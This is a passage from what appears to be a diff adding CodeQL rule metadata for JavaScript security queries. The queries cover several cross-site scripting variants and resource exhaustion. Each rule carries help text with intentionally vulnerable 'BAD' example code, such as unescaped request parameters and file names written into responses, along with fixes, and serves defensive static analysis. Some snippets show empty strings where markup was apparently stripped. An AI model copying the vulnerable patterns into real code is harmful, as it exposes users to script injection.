"js/resource-exhaustion-from-deep-object-traversal", + "kind" : "path-problem", + "name" : "Resources exhaustion from deep object traversal", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/xss-through-dom", + "name" : "js/xss-through-dom", + "shortDescription" : { + "text" : "DOM text reinterpreted as HTML" + }, + "fullDescription" : { + "text" : "Reinterpreting text from the DOM as HTML can lead to a cross-site scripting vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# DOM text reinterpreted as HTML\nExtracting text from a DOM node and interpreting it as HTML can lead to a cross-site scripting vulnerability.\n\nA webpage with this vulnerability reads text from the DOM, and afterwards adds the text as HTML to the DOM. Using text from the DOM as HTML effectively unescapes the text, and thereby invalidates any escaping done on the text. If an attacker is able to control the safe sanitized text, then this vulnerability can be exploited to perform a cross-site scripting attack.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing text to the page, or one of the other solutions that are mentioned in the References section below.\n\n\n## Example\nThe following example shows a webpage using a `data-target` attribute to select and manipulate a DOM element using the JQuery library. 
In the example, the `data-target` attribute is read into the `target` variable, and the `$` function is then supposed to use the `target` variable as a CSS selector to determine which element should be manipulated.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n $(target).hide();\n});\n\n```\nHowever, if an attacker can control the `data-target` attribute, then the value of `target` can be used to cause the `$` function to execute arbitrary JavaScript.\n\nThe above vulnerability can be fixed by using `$.find` instead of `$`. The `$.find` function will only interpret `target` as a CSS selector and never as HTML, thereby preventing an XSS attack.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n\t$.find(target).hide();\n});\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# DOM text reinterpreted as HTML\nExtracting text from a DOM node and interpreting it as HTML can lead to a cross-site scripting vulnerability.\n\nA webpage with this vulnerability reads text from the DOM, and afterwards adds the text as HTML to the DOM. 
Using text from the DOM as HTML effectively unescapes the text, and thereby invalidates any escaping done on the text. If an attacker is able to control the safe sanitized text, then this vulnerability can be exploited to perform a cross-site scripting attack.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing text to the page, or one of the other solutions that are mentioned in the References section below.\n\n\n## Example\nThe following example shows a webpage using a `data-target` attribute to select and manipulate a DOM element using the JQuery library. In the example, the `data-target` attribute is read into the `target` variable, and the `$` function is then supposed to use the `target` variable as a CSS selector to determine which element should be manipulated.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n $(target).hide();\n});\n\n```\nHowever, if an attacker can control the `data-target` attribute, then the value of `target` can be used to cause the `$` function to execute arbitrary JavaScript.\n\nThe above vulnerability can be fixed by using `$.find` instead of `$`. 
The `$.find` function will only interpret `target` as a CSS selector and never as HTML, thereby preventing an XSS attack.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n\t$.find(target).hide();\n});\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Reinterpreting text from the DOM as HTML\n can lead to a cross-site scripting vulnerability.", + "id" : "js/xss-through-dom", + "kind" : "path-problem", + "name" : "DOM text reinterpreted as HTML", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/xss-through-exception", + "name" : "js/xss-through-exception", + "shortDescription" : { + "text" : "Exception text reinterpreted as HTML" + }, + "fullDescription" : { + "text" : "Reinterpreting text from an exception as HTML can lead to a cross-site scripting vulnerability." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Exception text reinterpreted as HTML\nDirectly writing error messages to a webpage without sanitization allows for a cross-site scripting vulnerability if parts of the error message can be influenced by a user.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows an exception being written directly to the document, and this exception can potentially be influenced by the page URL, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n \n try {\n var parsed = unknownParseFunction(deflt); \n } catch(e) {\n document.write(\"Had an error: \" + e + \".\");\n }\n}\n\n```\n\n## Example\nThis second example shows an input being validated using the JSON schema validator `ajv`, and in case of an error, the error message is sent directly back in the response.\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet app = express();\nlet ajv = new Ajv();\n\najv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollData');\n\napp.post('/polldata', (req, res) => {\n if (!ajv.validate('pollData', req.body)) {\n res.send(ajv.errorsText());\n }\n});\n\n```\nThis is unsafe, because the error message can contain parts of the input. 
For example, the input `{'': 'foo'}` will generate the error `data/ should be number`, causing reflected XSS.\n\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Exception text reinterpreted as HTML\nDirectly writing error messages to a webpage without sanitization allows for a cross-site scripting vulnerability if parts of the error message can be influenced by a user.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows an exception being written directly to the document, and this exception can potentially be influenced by the page URL, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n \n try {\n var parsed = unknownParseFunction(deflt); \n } catch(e) {\n document.write(\"Had an error: \" + e + \".\");\n }\n}\n\n```\n\n## Example\nThis second example shows an input being validated using the JSON schema validator `ajv`, and in case of an error, the error message is sent directly 
back in the response.\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet app = express();\nlet ajv = new Ajv();\n\najv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollData');\n\napp.post('/polldata', (req, res) => {\n if (!ajv.validate('pollData', req.body)) {\n res.send(ajv.errorsText());\n }\n});\n\n```\nThis is unsafe, because the error message can contain parts of the input. For example, the input `{'': 'foo'}` will generate the error `data/ should be number`, causing reflected XSS.\n\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Reinterpreting text from an exception as HTML\n can lead to a cross-site scripting vulnerability.", + "id" : "js/xss-through-exception", + "kind" : "path-problem", + "name" : "Exception text reinterpreted as HTML", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/unsafe-jquery-plugin", + "name" : "js/unsafe-jquery-plugin", + "shortDescription" : { + "text" : "Unsafe jQuery plugin" + }, + "fullDescription" : { + "text" : "A jQuery plugin that unintentionally constructs HTML from some of its 
options may be unsafe to use for clients." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Unsafe jQuery plugin\nLibrary plugins, such as those for the jQuery library, are often configurable through options provided by the clients of the plugin. Clients, however, do not know the implementation details of the plugin, so it is important to document the capabilities of each option. The documentation for the plugin options that the client is responsible for sanitizing is of particular importance. Otherwise, the plugin may write user input (for example, a URL query parameter) to a web page without properly sanitizing it first, which allows for a cross-site scripting vulnerability in the client application through dynamic HTML construction.\n\n\n## Recommendation\nDocument all options that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example shows a jQuery plugin that selects a DOM element, and copies its text content to another DOM element. 
The selection is performed by using the plugin option `sourceSelector` as a CSS selector.\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// BAD may evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\nThis is, however, not a safe plugin, since the call to `jQuery` interprets `sourceSelector` as HTML if it is a string that starts with `<`.\n\nInstead of documenting that the client is responsible for sanitizing `sourceSelector`, the plugin can use `jQuery.find` to always interpret `sourceSelector` as a CSS selector:\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// GOOD may not evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery.find(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* jQuery: [Plugin creation](https://learn.jquery.com/plugins/basic-plugin-creation/).\n* Bootstrap: [XSS vulnerable bootstrap plugins](https://github.com/twbs/bootstrap/pull/27047).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Unsafe jQuery plugin\nLibrary plugins, such as those for the jQuery library, are often configurable through options provided by the clients of the plugin. 
Clients, however, do not know the implementation details of the plugin, so it is important to document the capabilities of each option. The documentation for the plugin options that the client is responsible for sanitizing is of particular importance. Otherwise, the plugin may write user input (for example, a URL query parameter) to a web page without properly sanitizing it first, which allows for a cross-site scripting vulnerability in the client application through dynamic HTML construction.\n\n\n## Recommendation\nDocument all options that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example shows a jQuery plugin that selects a DOM element, and copies its text content to another DOM element. The selection is performed by using the plugin option `sourceSelector` as a CSS selector.\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// BAD may evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\nThis is, however, not a safe plugin, since the call to `jQuery` interprets `sourceSelector` as HTML if it is a string that starts with `<`.\n\nInstead of documenting that the client is responsible for sanitizing `sourceSelector`, the plugin can use `jQuery.find` to always interpret `sourceSelector` as a CSS selector:\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// GOOD may not evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery.find(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP 
[DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* jQuery: [Plugin creation](https://learn.jquery.com/plugins/basic-plugin-creation/).\n* Bootstrap: [XSS vulnerable bootstrap plugins](https://github.com/twbs/bootstrap/pull/27047).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116", "frameworks/jquery" ], + "description" : "A jQuery plugin that unintentionally constructs HTML from some of its options may be unsafe to use for clients.", + "id" : "js/unsafe-jquery-plugin", + "kind" : "path-problem", + "name" : "Unsafe jQuery plugin", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/xss", + "name" : "js/xss", + "shortDescription" : { + "text" : "Client-side cross-site scripting" + }, + "fullDescription" : { + "text" : "Writing user input directly to the DOM allows for a cross-site scripting vulnerability." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side cross-site scripting\nDirectly writing user input (for example, a URL query parameter) to a webpage without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *DOM-based* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows part of the page URL being written directly to the document, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n document.write(\"\");\n document.write(\"\");\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Client-side cross-site scripting\nDirectly writing user input (for example, a URL query parameter) to a webpage without properly sanitizing the input first, allows for a 
cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *DOM-based* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows part of the page URL being written directly to the document, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n document.write(\"\");\n document.write(\"\");\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Writing user input directly to the DOM allows for\n a cross-site scripting vulnerability.", + "id" : "js/xss", + "kind" : "path-problem", + "name" : "Client-side cross-site scripting", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/reflected-xss", + "name" : "js/reflected-xss", + 
"shortDescription" : { + "text" : "Reflected cross-site scripting" + }, + "fullDescription" : { + "text" : "Writing user input directly to an HTTP response allows for a cross-site scripting vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Reflected cross-site scripting\nDirectly writing user input (for example, an HTTP request parameter) to an HTTP response without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *reflected* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the response, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes part of an HTTP request (which is controlled by the user) directly to the response. 
This leaves the website vulnerable to cross-site scripting.\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // BAD: a request parameter is incorporated without validation into the response\n res.send(\"Unknown user: \" + req.params.id);\n else\n // TODO: do something exciting\n ;\n});\n\n```\nSanitizing the user-controlled data prevents the vulnerability:\n\n\n```javascript\nvar escape = require('escape-html');\n\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // GOOD: request parameter is sanitized before incorporating it into the response\n res.send(\"Unknown user: \" + escape(req.params.id));\n else\n // TODO: do something exciting\n ;\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Reflected cross-site scripting\nDirectly writing user input (for example, an HTTP request parameter) to an HTTP response without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *reflected* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the response, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe 
following example code writes part of an HTTP request (which is controlled by the user) directly to the response. This leaves the website vulnerable to cross-site scripting.\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // BAD: a request parameter is incorporated without validation into the response\n res.send(\"Unknown user: \" + req.params.id);\n else\n // TODO: do something exciting\n ;\n});\n\n```\nSanitizing the user-controlled data prevents the vulnerability:\n\n\n```javascript\nvar escape = require('escape-html');\n\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // GOOD: request parameter is sanitized before incorporating it into the response\n res.send(\"Unknown user: \" + escape(req.params.id));\n else\n // TODO: do something exciting\n ;\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Writing user input directly to an HTTP response allows for\n a cross-site scripting vulnerability.", + "id" : "js/reflected-xss", + "kind" : "path-problem", + "name" : "Reflected cross-site scripting", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/html-constructed-from-input", + "name" : "js/html-constructed-from-input", + 
"shortDescription" : { + "text" : "Unsafe HTML constructed from library input" + }, + "fullDescription" : { + "text" : "Using externally controlled strings to construct HTML might allow a malicious user to perform a cross-site scripting attack." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Unsafe HTML constructed from library input\nWhen a library function dynamically constructs HTML in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may inadvertently use inputs containing unsafe HTML fragments, and thereby leave the client vulnerable to cross-site scripting attacks.\n\n\n## Recommendation\nDocument all library functions that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example has a library function that renders a boldface name by writing to the `innerHTML` property of an element.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n document.getElementById('name').innerHTML = \"\" + name + \"\";\n}\n\n```\nThis library function, however, does not escape unsafe HTML, and a client that calls the function with user-supplied input may be vulnerable to cross-site scripting attacks.\n\nThe library could either document that this function should not be used with unsafe inputs, or use safe APIs such as `innerText`.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n const bold = document.createElement('b');\n bold.innerText = name;\n document.getElementById('name').appendChild(bold);\n}\n\n```\nAlternatively, an HTML sanitizer can be used to remove unsafe content.\n\n\n```javascript\n\nconst striptags = require('striptags');\nmodule.exports = function showBoldName(name) {\n 
document.getElementById('name').innerHTML = \"\" + striptags(name) + \"\";\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Unsafe HTML constructed from library input\nWhen a library function dynamically constructs HTML in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. 
If the function is not documented as being potentially unsafe, then a client may inadvertently use inputs containing unsafe HTML fragments, and thereby leave the client vulnerable to cross-site scripting attacks.\n\n\n## Recommendation\nDocument all library functions that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example has a library function that renders a boldface name by writing to the `innerHTML` property of an element.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n document.getElementById('name').innerHTML = \"\" + name + \"\";\n}\n\n```\nThis library function, however, does not escape unsafe HTML, and a client that calls the function with user-supplied input may be vulnerable to cross-site scripting attacks.\n\nThe library could either document that this function should not be used with unsafe inputs, or use safe APIs such as `innerText`.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n const bold = document.createElement('b');\n bold.innerText = name;\n document.getElementById('name').appendChild(bold);\n}\n\n```\nAlternatively, an HTML sanitizer can be used to remove unsafe content.\n\n\n```javascript\n\nconst striptags = require('striptags');\nmodule.exports = function showBoldName(name) {\n document.getElementById('name').innerHTML = \"\" + striptags(name) + \"\";\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site 
scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Using externally controlled strings to construct HTML might allow a malicious\n user to perform a cross-site scripting attack.", + "id" : "js/html-constructed-from-input", + "kind" : "path-problem", + "name" : "Unsafe HTML constructed from library input", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/stored-xss", + "name" : "js/stored-xss", + "shortDescription" : { + "text" : "Stored cross-site scripting" + }, + "fullDescription" : { + "text" : "Using uncontrolled stored values in HTML allows for a stored cross-site scripting vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Stored cross-site scripting\nDirectly using uncontrolled stored value (for example, file names) to create HTML content without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *stored* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before using uncontrolled stored values to create HTML content, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes file names directly to a HTTP response. 
This leaves the website vulnerable to cross-site scripting, if an attacker can choose the file names on the disk.\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // BAD: `fileName` can contain HTML elements\n list += '
  • ' + fileName + '
  • ';\n });\n list += '
'\n res.send(list);\n });\n});\n\n```\nSanitizing the file names prevents the vulnerability:\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs'),\n escape = require('escape-html');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // GOOD: escaped `fileName` can not contain HTML elements\n list += '
  • ' + escape(fileName) + '
  • ';\n });\n list += '
